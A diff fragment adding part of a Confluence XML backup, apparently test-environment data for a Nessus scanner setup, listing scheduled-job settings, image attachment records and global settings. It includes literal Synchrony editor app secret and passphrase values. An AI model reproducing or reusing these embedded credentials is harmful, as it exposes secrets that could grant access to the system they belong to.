+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32861</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#SynchronyEventsHardRemovalScheduledJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>false</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32858</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#SystemMaintenanceTaskQueueFlusherScheduledJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32859</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#ClusterSafetyJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32856</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#IndexSnapshotCleaner]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32857</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#JmxAppLoggingJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32854</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#EhCacheCompactionJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32855</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#ReIndexHouseKeepingScheduledJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32852</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#LocalTaskQueueFlushJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32853</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#TrashHardRemovalScheduledJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>false</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32882</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#reminderJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32883</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#confluenceDailyStatisticsPublisherJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32880</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#onboardingNumberOfUsersCheckJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98355</id>
+<property name="hibernateVersion">3</property>
+<property name="title"><![CDATA[step-2-image-1.png]]></property>
+<property name="lowerTitle"><![CDATA[step-2-image-1.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262201</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262203</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262205</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262207</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32881</id>
+<property name="context"><![CDATA[com.atlassian.confluence.efi.store.GlobalStorageServiceImpl]]></property>
+<property name="key"><![CDATA[efi.store.onboarding.onboardingNumberOfUsersCheckJob]]></property>
+<property name="value"><![CDATA[<string>JOB_FIRST_EXECUTE</string>]]></property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98356</id>
+<property name="hibernateVersion">3</property>
+<property name="title"><![CDATA[step-2-image-3.png]]></property>
+<property name="lowerTitle"><![CDATA[step-2-image-3.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262196</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262198</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262199</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262210</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32878</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#createBlueprintPageEntityCleanupJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32879</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#batchingJobConfig]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32876</id>
+<property name="context"><![CDATA[com.atlassian.confluence.efi.store.GlobalStorageServiceImpl]]></property>
+<property name="key"><![CDATA[efi.store.onboarding.onboardingSpaceCheckJob]]></property>
+<property name="value"><![CDATA[<string>JOB_FIRST_EXECUTE</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32877</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#cleanupTrigger]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32874</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#summaryEmail]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98349</id>
+<property name="hibernateVersion">18</property>
+<property name="title"><![CDATA[next.jpg]]></property>
+<property name="lowerTitle"><![CDATA[next.jpg]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262225</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262233</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262237</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32875</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#onboardingSpaceCheckJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98350</id>
+<property name="hibernateVersion">19</property>
+<property name="title"><![CDATA[step04-01.png]]></property>
+<property name="lowerTitle"><![CDATA[step04-01.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262202</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262208</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262234</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262241</id>
+</element>
+</collection>
+<property name="version">4</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32872</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#jira-metadata-cache-config]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98347</id>
+<property name="hibernateVersion">17</property>
+<property name="title"><![CDATA[start.jpg]]></property>
+<property name="lowerTitle"><![CDATA[start.jpg]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262206</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262231</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262232</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32873</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#deletedInviteesCleanUpJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98348</id>
+<property name="hibernateVersion">20</property>
+<property name="title"><![CDATA[step06-image02.png]]></property>
+<property name="lowerTitle"><![CDATA[step06-image02.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262215</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262216</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262217</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262221</id>
+</element>
+</collection>
+<property name="version">3</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32870</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#flushEdgeIndexQueue]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98353</id>
+<property name="hibernateVersion">21</property>
+<property name="title"><![CDATA[step06-image01.png]]></property>
+<property name="lowerTitle"><![CDATA[step06-image01.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262218</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262219</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262220</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262261</id>
+</element>
+</collection>
+<property name="version">4</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32871</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#conversionQueueMonitor]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98354</id>
+<property name="hibernateVersion">3</property>
+<property name="title"><![CDATA[step05-01.png]]></property>
+<property name="lowerTitle"><![CDATA[step05-01.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262266</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262267</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262268</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262269</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32868</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#addonHouskeeperTrigger-v2]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98351</id>
+<property name="hibernateVersion">9</property>
+<property name="title"><![CDATA[step05-03.png]]></property>
+<property name="lowerTitle"><![CDATA[step05-03.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262245</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262257</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262263</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262264</id>
+</element>
+</collection>
+<property name="version">2</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32869</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#purgeHistoryJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98352</id>
+<property name="hibernateVersion">8</property>
+<property name="title"><![CDATA[step04-02.png]]></property>
+<property name="lowerTitle"><![CDATA[step04-02.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262251</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262252</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262253</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262272</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32834</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[synchrony_collaborative_editor_app_id]]></property>
+<property name="value"><![CDATA[<string>Synchrony-0fccd6a4-3e18-398a-8fe4-ff41cdd6c7ad</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32835</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[synchrony_collaborative_editor_app_secret]]></property>
+<property name="value"><![CDATA[<string>ZmUL2wyLlx8ROyTY/satsTeR2J61ADRUqTnTe8Ai1og=</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32832</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.analytics.client.configuration..logged_base_analytics_data]]></property>
+<property name="value"><![CDATA[<string>true</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32833</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-update]]></property>
+<property name="value"><![CDATA[<list>
+  <string>com.atlassian.migration.agent</string>
+  <string>com.atlassian.troubleshooting.plugin-confluence</string>
+</list>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32830</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[synchrony_collaborative_editor_app_base_url]]></property>
+<property name="value"><![CDATA[<string>http://nessus-docker.local:8090/synchrony-proxy,http://nessus-docker.local:8090/synchrony-proxy</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32831</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[synchrony_collaborative_editor_app_passphrase]]></property>
+<property name="value"><![CDATA[<string>BxPVX1EMs+EycDmXIAthliGTBb3EAwLgeyaTxHBW4CE=</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32828</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-license.expired]]></property>
+<property name="value"><![CDATA[<list/>]]></property>
+</object>
+<object class="AlertEntityImpl" package="com.atlassian.confluence.internal.diagnostics.persistence.dao.hibernate">
+<id name="id">720897</id>
+<property name="detailsJson"><![CDATA[{"freeInMegabytes":144,"totalInMegabytes":4160,"minimumInMegabytes":256}]]></property>
+<property name="issueComponentId"><![CDATA[OS]]></property>
+<property name="issueId"><![CDATA[OS-1001]]></property>
+<property name="issueSeverity" enum-class="Severity" package="com.atlassian.diagnostics">WARNING</property>
+<property name="nodeName"><![CDATA[3b0401e4191f]]></property>
+<property name="nodeNameLower"><![CDATA[3b0401e4191f]]></property>
+<property name="timestampUtc">1699509909923</property>
+<property name="triggerModule"/><property name="triggerPluginKey"><![CDATA[not-detected]]></property>
+<property name="triggerPluginKeyLower"><![CDATA[not-detected]]></property>
+<property name="triggerPluginVersion"/></object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32829</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-license.nearlyexpired]]></property>
+<property name="value"><![CDATA[<list/>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32826</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-maintenance.expired]]></property>
+<property name="value"><![CDATA[<list/>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32827</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-maintenance.nearlyexpired]]></property>
+<property name="value"><![CDATA[<list/>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32824</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-evaluation.expired]]></property>
+<property name="value"><![CDATA[<list/>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32825</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-evaluation.nearlyexpired]]></property>
+<property name="value"><![CDATA[<list/>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32822</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-plugin.request]]></property>
+<property name="value"><![CDATA[<list/>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32823</id>
